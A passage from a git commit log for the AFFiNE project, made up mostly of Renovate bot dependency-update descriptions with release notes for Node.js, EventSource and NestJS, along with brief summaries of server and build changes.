[`b96e40d`](https://redirect.github.com/nodejs/node/commit/b96e40d5ac85)
(Clemens Backes)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`2268567237`](https://redirect.github.com/nodejs/node/commit/2268567237)]
- **deps**: V8: cherry-pick
[`7cb6188`](https://redirect.github.com/nodejs/node/commit/7cb6188cf913)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`92804cdbea`](https://redirect.github.com/nodejs/node/commit/92804cdbea)]
- **deps**: V8: cherry-pick
[`e7ccf0a`](https://redirect.github.com/nodejs/node/commit/e7ccf0af1bdd)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`eae2c27a40`](https://redirect.github.com/nodejs/node/commit/eae2c27a40)]
- **deps**: V8: cherry-pick
[`8e214ec`](https://redirect.github.com/nodejs/node/commit/8e214ec3ec8c)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`a1799a49bb`](https://redirect.github.com/nodejs/node/commit/a1799a49bb)]
- **deps**: V8: backport
[`63b8849`](https://redirect.github.com/nodejs/node/commit/63b8849d73ae)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`a2df2d8731`](https://redirect.github.com/nodejs/node/commit/a2df2d8731)]
- **deps**: V8: backport
[`3239427`](https://redirect.github.com/nodejs/node/commit/323942700cfe)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`e3d65c7dca`](https://redirect.github.com/nodejs/node/commit/e3d65c7dca)]
- **deps**: V8: backport
[`89dc6ea`](https://redirect.github.com/nodejs/node/commit/89dc6eab605c)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`5e7db133de`](https://redirect.github.com/nodejs/node/commit/5e7db133de)]
- **deps**: V8: backport
[`910cb91`](https://redirect.github.com/nodejs/node/commit/910cb91733dc)
(Jakob Kummerow)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`d0c24a28af`](https://redirect.github.com/nodejs/node/commit/d0c24a28af)]
- **deps**: V8: cherry-pick
[`b8f91e5`](https://redirect.github.com/nodejs/node/commit/b8f91e510e0f)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`d358687824`](https://redirect.github.com/nodejs/node/commit/d358687824)]
- **deps**: V8: cherry-pick
[`cf03d55`](https://redirect.github.com/nodejs/node/commit/cf03d55db2a0)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`67c8b2c349`](https://redirect.github.com/nodejs/node/commit/67c8b2c349)]
- **deps**: V8: cherry-pick
[`692f3d5`](https://redirect.github.com/nodejs/node/commit/692f3d526a38)
(Sébastien Doeraene)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`71e5a59ffd`](https://redirect.github.com/nodejs/node/commit/71e5a59ffd)]
- **deps**: V8: cherry-pick
[`c734674`](https://redirect.github.com/nodejs/node/commit/c734674e03f9)
(Manos Koukoutos)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`f0dbe81c7b`](https://redirect.github.com/nodejs/node/commit/f0dbe81c7b)]
- **deps**: V8: cherry-pick
[`b2f3aea`](https://redirect.github.com/nodejs/node/commit/b2f3aea23a01)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`d333f480c3`](https://redirect.github.com/nodejs/node/commit/d333f480c3)]
- **deps**: V8: cherry-pick
[`5f1342c`](https://redirect.github.com/nodejs/node/commit/5f1342c20b59)
(Matthias Liedtke)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`db722725bb`](https://redirect.github.com/nodejs/node/commit/db722725bb)]
- **deps**: use npm undici\@&#8203;six tag in `update-undici.sh` (Matteo
Collina)
[#&#8203;63012](https://redirect.github.com/nodejs/node/pull/63012)
-
\[[`9b57979d9c`](https://redirect.github.com/nodejs/node/commit/9b57979d9c)]
- **doc**: add Rafael to last security release steward (Rafael Gonzaga)
[#&#8203;62423](https://redirect.github.com/nodejs/node/pull/62423)
-
\[[`d8075585bf`](https://redirect.github.com/nodejs/node/commit/d8075585bf)]
- **doc**: add path to vulnerabilities.json mention (Rafael Gonzaga)
[#&#8203;62355](https://redirect.github.com/nodejs/node/pull/62355)
-
\[[`6ec9a70204`](https://redirect.github.com/nodejs/node/commit/6ec9a70204)]
- **doc**: clarify fs.ReadStream and fs.WriteStream are not
constructable (Kit Dallege)
[#&#8203;62208](https://redirect.github.com/nodejs/node/pull/62208)
-
\[[`1fc86fcb6e`](https://redirect.github.com/nodejs/node/commit/1fc86fcb6e)]
- **doc**: add note (and caveat) for `mock.module` about customization
hooks (Jacob Smith)
[#&#8203;62075](https://redirect.github.com/nodejs/node/pull/62075)
-
\[[`491be80bd9`](https://redirect.github.com/nodejs/node/commit/491be80bd9)]
- **doc**: add efekrskl as triager (Efe)
[#&#8203;61876](https://redirect.github.com/nodejs/node/pull/61876)
-
\[[`18558293a3`](https://redirect.github.com/nodejs/node/commit/18558293a3)]
- **doc**: fix module.stripTypeScriptTypes indentation (René)
[#&#8203;61992](https://redirect.github.com/nodejs/node/pull/61992)
-
\[[`8e20976522`](https://redirect.github.com/nodejs/node/commit/8e20976522)]
- **doc**: explicitly mention Slack handle (Rafael Gonzaga)
[#&#8203;61986](https://redirect.github.com/nodejs/node/pull/61986)
-
\[[`70b8e6b4fb`](https://redirect.github.com/nodejs/node/commit/70b8e6b4fb)]
- **doc**: rename invalid `function` parameter (René)
[#&#8203;61942](https://redirect.github.com/nodejs/node/pull/61942)
-
\[[`4045c76f6c`](https://redirect.github.com/nodejs/node/commit/4045c76f6c)]
- **doc**: clarify status of feature request issues (Antoine du Hamel)
[#&#8203;61505](https://redirect.github.com/nodejs/node/pull/61505)
-
\[[`c54652f2aa`](https://redirect.github.com/nodejs/node/commit/c54652f2aa)]
- **doc**: remove incorrect mention of `module` in `typescript.md` (Rob
Palmer)
[#&#8203;61839](https://redirect.github.com/nodejs/node/pull/61839)
-
\[[`9fad6cedf5`](https://redirect.github.com/nodejs/node/commit/9fad6cedf5)]
- **doc**: clarify async caveats for `events.once()` (René)
[#&#8203;61572](https://redirect.github.com/nodejs/node/pull/61572)
-
\[[`2f1e5733fe`](https://redirect.github.com/nodejs/node/commit/2f1e5733fe)]
- **doc**: update Juan's security steward info (Juan José)
[#&#8203;61754](https://redirect.github.com/nodejs/node/pull/61754)
-
\[[`a64bdb5068`](https://redirect.github.com/nodejs/node/commit/a64bdb5068)]
- **doc**: fix overstated Date header requirement in response.sendDate
(Kit Dallege)
[#&#8203;62206](https://redirect.github.com/nodejs/node/pull/62206)
-
\[[`02797de923`](https://redirect.github.com/nodejs/node/commit/02797de923)]
- **doc**: fix small environment\_variables typo (chris)
[#&#8203;62279](https://redirect.github.com/nodejs/node/pull/62279)
-
\[[`f22ebdc809`](https://redirect.github.com/nodejs/node/commit/f22ebdc809)]
- **doc**: fix small logic error in DETECT\_MODULE\_SYNTAX (René)
[#&#8203;62025](https://redirect.github.com/nodejs/node/pull/62025)
-
\[[`9f4508062a`](https://redirect.github.com/nodejs/node/commit/9f4508062a)]
- **doc**: fix methods being documented as properties in `process.md`
(Antoine du Hamel)
[#&#8203;61765](https://redirect.github.com/nodejs/node/pull/61765)
-
\[[`3ea39ff135`](https://redirect.github.com/nodejs/node/commit/3ea39ff135)]
- **doc**: fix dropdown menu being obscured at <600px due to stacking
context (Jeff)
[#&#8203;61735](https://redirect.github.com/nodejs/node/pull/61735)
-
\[[`c22445079b`](https://redirect.github.com/nodejs/node/commit/c22445079b)]
- **doc**: fix spacing in process message event (Aviv Keller)
[#&#8203;61756](https://redirect.github.com/nodejs/node/pull/61756)
-
\[[`32831b5223`](https://redirect.github.com/nodejs/node/commit/32831b5223)]
- **doc**: fix broken links of net.md (YuSheng Chen)
[#&#8203;61673](https://redirect.github.com/nodejs/node/pull/61673)
-
\[[`005508d509`](https://redirect.github.com/nodejs/node/commit/005508d509)]
- **doc**: remove obsolete Boxstarter automated install (Mike McCready)
[#&#8203;61785](https://redirect.github.com/nodejs/node/pull/61785)
-
\[[`37c2fd6f7d`](https://redirect.github.com/nodejs/node/commit/37c2fd6f7d)]
- **esm**: fix path normalization in `finalizeResolution` (Antoine du
Hamel)
[#&#8203;62080](https://redirect.github.com/nodejs/node/pull/62080)
-
\[[`1769d74613`](https://redirect.github.com/nodejs/node/commit/1769d74613)]
- **esm**: populate separate cache for require(esm) in imported CJS
(Joyee Cheung)
[#&#8203;59679](https://redirect.github.com/nodejs/node/pull/59679)
-
\[[`ee02966ffc`](https://redirect.github.com/nodejs/node/commit/ee02966ffc)]
- **http**: fix keep-alive socket reuse race in requestOnFinish (Martin
Slota)
[#&#8203;61710](https://redirect.github.com/nodejs/node/pull/61710)
-
\[[`2fdb5ce6cc`](https://redirect.github.com/nodejs/node/commit/2fdb5ce6cc)]
- **http2**: fix FileHandle leak in respondWithFile (sangwook)
[#&#8203;61707](https://redirect.github.com/nodejs/node/pull/61707)
-
\[[`aa2c1eca04`](https://redirect.github.com/nodejs/node/commit/aa2c1eca04)]
- **lib**: fix source map url parse in dynamic imports (Chengzhong Wu)
[#&#8203;61990](https://redirect.github.com/nodejs/node/pull/61990)
-
\[[`785b00cbeb`](https://redirect.github.com/nodejs/node/commit/785b00cbeb)]
- **meta**: pass release version to release worker (flakey5)
[#&#8203;62777](https://redirect.github.com/nodejs/node/pull/62777)
-
\[[`447fb9a0b5`](https://redirect.github.com/nodejs/node/commit/447fb9a0b5)]
- **meta**: persist sccache daemon until end of build workflows (René)
[#&#8203;61639](https://redirect.github.com/nodejs/node/pull/61639)
-
\[[`5065a0acb3`](https://redirect.github.com/nodejs/node/commit/5065a0acb3)]
- **module**: do not invoke resolve hooks twice for imported cjs (Joyee
Cheung)
[#&#8203;61529](https://redirect.github.com/nodejs/node/pull/61529)
-
\[[`9a2e21305d`](https://redirect.github.com/nodejs/node/commit/9a2e21305d)]
- **module**: do not wrap module.\_load when tracing is not enabled
(Joyee Cheung)
[#&#8203;61479](https://redirect.github.com/nodejs/node/pull/61479)
-
\[[`b9240bc063`](https://redirect.github.com/nodejs/node/commit/b9240bc063)]
- **module**: fix sync resolve hooks for require with node: prefixes
(Joyee Cheung)
[#&#8203;61088](https://redirect.github.com/nodejs/node/pull/61088)
-
\[[`2e91b28aaf`](https://redirect.github.com/nodejs/node/commit/2e91b28aaf)]
- **module**: handle null source from async loader hooks in sync hooks
(Joyee Cheung)
[#&#8203;59929](https://redirect.github.com/nodejs/node/pull/59929)
-
\[[`39147c154e`](https://redirect.github.com/nodejs/node/commit/39147c154e)]
- **module**: use sync cjs when importing cts (Marco Ippolito)
[#&#8203;60072](https://redirect.github.com/nodejs/node/pull/60072)
-
\[[`12a2462b2c`](https://redirect.github.com/nodejs/node/commit/12a2462b2c)]
- **module**: only put directly require-d ESM into require.cache (Joyee
Cheung)
[#&#8203;59874](https://redirect.github.com/nodejs/node/pull/59874)
- \[[`cf39566277`](https://redirect.github.com/nodejs/node/commit/cf39566277)] - **src**: fix flags argument offset in JSUdpWrap (Weixie Cui) [#61948](https://redirect.github.com/nodejs/node/pull/61948)
- \[[`578a9a9230`](https://redirect.github.com/nodejs/node/commit/578a9a9230)] - **src**: clamp WriteUtf8 capacity to INT\_MAX in EncodeInto (semimikoh) [#62621](https://redirect.github.com/nodejs/node/pull/62621)
- \[[`57c3035fec`](https://redirect.github.com/nodejs/node/commit/57c3035fec)] - **stream**: fix decoded fromList chunk boundary check (Thomas Watson) [#61884](https://redirect.github.com/nodejs/node/pull/61884)
- \[[`57fb008bb8`](https://redirect.github.com/nodejs/node/commit/57fb008bb8)] - **test**: update tls junk data error expectations (Filip Skokan) [#62629](https://redirect.github.com/nodejs/node/pull/62629)
- \[[`363f9a9d18`](https://redirect.github.com/nodejs/node/commit/363f9a9d18)] - **test**: skip `test-url` on `--shared-ada` builds (Antoine du Hamel) [#62019](https://redirect.github.com/nodejs/node/pull/62019)
- \[[`daaead342b`](https://redirect.github.com/nodejs/node/commit/daaead342b)] - **test**: simplify encodeInto large buffer regression test (semimikoh) [#62621](https://redirect.github.com/nodejs/node/pull/62621)
- \[[`ecfa766b41`](https://redirect.github.com/nodejs/node/commit/ecfa766b41)] - **tools**: fix auto-start-ci (Antoine du Hamel) [#61900](https://redirect.github.com/nodejs/node/pull/61900)
- \[[`17c0a610af`](https://redirect.github.com/nodejs/node/commit/17c0a610af)] - **tools**: fix parsing of commit trailers in `lint-release-proposal` GHA (Antoine du Hamel) [#62077](https://redirect.github.com/nodejs/node/pull/62077)
- \[[`89ad7dc63b`](https://redirect.github.com/nodejs/node/commit/89ad7dc63b)] - **tools**: enforce removal of `lts-watch-*` labels on release proposals (Antoine du Hamel) [#61672](https://redirect.github.com/nodejs/node/pull/61672)
- \[[`5f9bb8ef0c`](https://redirect.github.com/nodejs/node/commit/5f9bb8ef0c)] - **tools**: revert tools GHA workflow to ubuntu-latest (Richard Lau) [#62024](https://redirect.github.com/nodejs/node/pull/62024)
- \[[`977ef80ac1`](https://redirect.github.com/nodejs/node/commit/977ef80ac1)] - **url**: process crash via malformed UNC hostname in pathToFileURL() (Nicola Del Gobbo) [#62574](https://redirect.github.com/nodejs/node/pull/62574)
- \[[`ad8f518a81`](https://redirect.github.com/nodejs/node/commit/ad8f518a81)] - **zlib**: fix use-after-free when reset() is called during write (Matteo Collina) [#62325](https://redirect.github.com/nodejs/node/pull/62325)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.


---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 11:55:16 +08:00
DarkSky f626dbd590 fix(server): realtime loading (#14959)
#### PR Dependency Tree


* **PR #14959** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
  * Rewired realtime and copilot services to require their runtime
    dependencies, improving reliability and removing nullable/optional
    runtime paths.

* **Tests**
  * Centralized service creation in tests with helper factories and added
    checks ensuring realtime dependency injection is configured as expected.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-14 11:54:45 +08:00
renovate[bot] 419fc5d5e0 chore: bump up Recouse/EventSource version to from: "0.1.8" (#14960)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [Recouse/EventSource](https://redirect.github.com/Recouse/EventSource) | patch | `from: "0.1.7"` → `from: "0.1.8"` |

---

### Release Notes

<details>
<summary>Recouse/EventSource (Recouse/EventSource)</summary>

###
[`v0.1.8`](https://redirect.github.com/Recouse/EventSource/releases/tag/0.1.8)

[Compare
Source](https://redirect.github.com/Recouse/EventSource/compare/0.1.7...0.1.8)

#### What's Changed

- Fix O(n²) performance in ServerEventParser.parse() by
[@&#8203;liefran-sim](https://redirect.github.com/liefran-sim) in
[#&#8203;49](https://redirect.github.com/Recouse/EventSource/pull/49)

#### New Contributors

- [@&#8203;liefran-sim](https://redirect.github.com/liefran-sim) made
their first contribution in
[#&#8203;49](https://redirect.github.com/Recouse/EventSource/pull/49)

**Full Changelog**:
<https://github.com/Recouse/EventSource/compare/0.1.7...0.1.8>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.


---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 10:15:11 +08:00
DarkSky 1201f7c350 chore: bump rspack (#14957)
#### PR Dependency Tree


* **PR #14957** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
  * Updated minimum Node version requirement to 22.12.0 or later.
  * Updated build tool dependencies including rspack and related packages.
  * Removed CI-specific logging behavior from development server.
  * Migrated to native HTML plugin integration for improved build
    efficiency.
  * Simplified build configuration by removing unused experimental
    options.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-14 04:18:49 +08:00
DarkSky 4b4def3a11 feat(server): gemini embedding 2 support (#14956)
#### PR Dependency Tree


* **PR #14956** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
  * Improved Gemini Vertex provider configuration validation logic for
    enhanced reliability.
  * Refined Google Vertex publisher base URL construction handling.

* **Tests**
  * Added test coverage for Gemini Embedding 2 model resolution.
  * Added test coverage for Gemini Vertex provider Google Cloud
    integration.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-14 04:12:49 +08:00
renovate[bot] 2b22fe4692 chore: bump up nestjs (#13791)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/apollo](https://redirect.github.com/nestjs/graphql) | [`13.2.4` → `13.4.0`](https://renovatebot.com/diffs/npm/@nestjs%2fapollo/13.2.4/13.4.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fapollo/13.4.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fapollo/13.2.4/13.4.0?slim=true) |
| [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.18/11.1.20) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.20?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.18/11.1.20?slim=true) |
| [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.18/11.1.20) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.20?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.18/11.1.20?slim=true) |
| [@nestjs/graphql](https://redirect.github.com/nestjs/graphql) | [`13.2.5` → `13.4.0`](https://renovatebot.com/diffs/npm/@nestjs%2fgraphql/13.2.5/13.4.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fgraphql/13.4.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fgraphql/13.2.5/13.4.0?slim=true) |
| [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.18/11.1.20) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.20?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.18/11.1.20?slim=true) |
| [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.18/11.1.20) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.20?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.18/11.1.20?slim=true) |
| [@nestjs/schedule](https://redirect.github.com/nestjs/schedule) | [`6.1.1` → `6.1.3`](https://renovatebot.com/diffs/npm/@nestjs%2fschedule/6.1.1/6.1.3) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fschedule/6.1.3?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fschedule/6.1.1/6.1.3?slim=true) |
| [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) | [`11.2.7` → `11.4.2`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.2.7/11.4.2) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fswagger/11.4.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fswagger/11.2.7/11.4.2?slim=true) |
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.18/11.1.20) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.20?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.18/11.1.20?slim=true) |

---

### Release Notes

<details>
<summary>nestjs/graphql (@&#8203;nestjs/apollo)</summary>

###
[`v13.4.0`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.4.0)

[Compare
Source](https://redirect.github.com/nestjs/graphql/compare/v13.3.0...v13.4.0)

#### 13.4.0 (2026-04-30)

##### Features

- `apollo`, `graphql`, `mercurius`
- [#&#8203;3811](https://redirect.github.com/nestjs/graphql/pull/3811)
feat(graphql): Add registerIn option for module-scoped type filtering
([@&#8203;joe-re](https://redirect.github.com/joe-re))

##### Bug fixes

- `graphql`
- [#&#8203;3959](https://redirect.github.com/nestjs/graphql/pull/3959)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
stop double-registering PickType inputs
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3960](https://redirect.github.com/nestjs/graphql/pull/3960)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
de-duplicate per-target metadata in TargetMetadataCollection
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- `apollo`, `graphql`
- [#&#8203;3962](https://redirect.github.com/nestjs/graphql/pull/3962)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
restore Timestamp scalar parsers in federation factory
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Enhancements

- `graphql`
- [#&#8203;3963](https://redirect.github.com/nestjs/graphql/pull/3963)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
validate registerEnumType/createUnionType options eagerly
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Dependencies

- `graphql`
- [#&#8203;3954](https://redirect.github.com/nestjs/graphql/pull/3954)
fix(deps): update graphql-tools monorepo
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 3

- Masato Noguchi ([@&#8203;joe-re](https://redirect.github.com/joe-re))
- Mateus Welter Goettems
([@&#8203;mateuswgoettems](https://redirect.github.com/mateuswgoettems))
- Yogeshwaran C
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

###
[`v13.3.0`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.3.0)

[Compare
Source](https://redirect.github.com/nestjs/graphql/compare/v13.2.5...v13.3.0)

#### 13.3.0 (2026-04-22)

##### Bug fixes

- `graphql`
- [#&#8203;3949](https://redirect.github.com/nestjs/graphql/pull/3949)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
count args for parenless arrow functions
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3952](https://redirect.github.com/nestjs/graphql/pull/3952)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
keep class directive when a field has the same SDL
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3946](https://redirect.github.com/nestjs/graphql/pull/3946)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
emit enum key for Args defaultValue in generated SDL
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3934](https://redirect.github.com/nestjs/graphql/pull/3934)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
treat single-key string enums as enums in plugin type detection
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3939](https://redirect.github.com/nestjs/graphql/pull/3939)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
preserve ResolveField options for all overloads
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- `apollo`
- [#&#8203;3940](https://redirect.github.com/nestjs/graphql/pull/3940)
fix(apollo): preserve HTTP 200 for execution-level GraphQL errors
([@&#8203;maruthang](https://redirect.github.com/maruthang))

##### Enhancements

- `graphql`
- [#&#8203;3838](https://redirect.github.com/nestjs/graphql/pull/3838)
perf(graphql): bypass ExternalContextCreator for scalar ResolveField
fast-path ([@&#8203;ArielSafar](https://redirect.github.com/ArielSafar))
- [#&#8203;3950](https://redirect.github.com/nestjs/graphql/pull/3950)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
forward specifiedByURL and extensions on custom scalars
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3951](https://redirect.github.com/nestjs/graphql/pull/3951)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
accept array of SDL strings in
[@&#8203;Directive](https://redirect.github.com/Directive)
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3944](https://redirect.github.com/nestjs/graphql/pull/3944)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
emit clearer error when nested object type is used in mapped input
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3943](https://redirect.github.com/nestjs/graphql/pull/3943)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
add conditional exports for browser shim
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3942](https://redirect.github.com/nestjs/graphql/pull/3942)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
default federation to v2.12 directives
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3936](https://redirect.github.com/nestjs/graphql/pull/3936)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
allow CustomScalar methods to return null
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- `apollo`, `graphql`
- [#&#8203;3948](https://redirect.github.com/nestjs/graphql/pull/3948)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
support directives on enums and unions
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Dependencies

- `graphql`
- [#&#8203;3925](https://redirect.github.com/nestjs/graphql/pull/3925)
chore(deps): update dependency ts-morph to v28
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3918](https://redirect.github.com/nestjs/graphql/pull/3918)
fix(deps): update graphql-tools monorepo
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `mercurius`
- [#&#8203;3928](https://redirect.github.com/nestjs/graphql/pull/3928)
chore(deps): update dependency fastify to v5.8.5
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3858](https://redirect.github.com/nestjs/graphql/pull/3858)
chore(deps): update dependency
[@&#8203;mercuriusjs/gateway](https://redirect.github.com/mercuriusjs/gateway)
to v5.2.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3920](https://redirect.github.com/nestjs/graphql/pull/3920)
chore(deps): update dependency mercurius to v16.9.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 3

- Ariel Safar
([@&#8203;ArielSafar](https://redirect.github.com/ArielSafar))
- Maruthan G
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- Yogeshwaran C
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

###
[`v13.2.5`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.2.5)

[Compare
Source](https://redirect.github.com/nestjs/graphql/compare/v13.2.4...v13.2.5)

##### 13.2.5 (2026-04-09)

##### Bug fixes

- `graphql`
- [#&#8203;3846](https://redirect.github.com/nestjs/graphql/pull/3846)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
handle definitions factory typename option
([@&#8203;NicolasGn](https://redirect.github.com/NicolasGn))

##### Enhancements

- `graphql`
